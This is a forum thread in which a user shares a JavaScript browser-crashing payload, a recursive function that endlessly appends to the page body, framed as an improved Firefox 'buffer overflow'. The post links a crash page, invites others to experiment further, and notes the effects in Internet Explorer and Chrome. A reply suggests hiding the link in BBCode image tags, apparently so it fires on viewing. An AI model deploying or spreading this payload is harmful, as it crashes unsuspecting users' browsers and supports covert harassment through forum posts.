[dos] Firefox Buffer Overflow

XURY

Member
May 9, 2015
60
96
53
Hey!

So recently as i was browsing through the web i found a firefox vulnerability on exploit-db.
I thought "why not give it a try and improve it"! Let's try to revive things :D

This is what i came up with and obviously i managed to improve it ;)
CLICK HERE (WARNING - YOUR BROWSER WILL CRASH)

And it seems to overload other browsers in some strange way/s, too...

OVERLOAD CODE:
Code:
function e(x)
{
  document.body.innerHTML += x;
  e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x')))))))))))));
};
e('x')
Feel free to experiment with that!
Maybe using less characters will also take effects on the computer itself? Let's get this somewhere! ;)

OTHER BROWSERS
Internet Explorer - Keeps loading until a popup wants you to stop a script
Chrome - Again...Keeps loading until it asks you if you want to stop any scripts running
 
Last edited:

Styleer

Restricted
Sep 19, 2015
3
0
33
You should do as
bbcode
img] so it will be more cool.
< this means your url will not work inside of bbcode as img
 
Top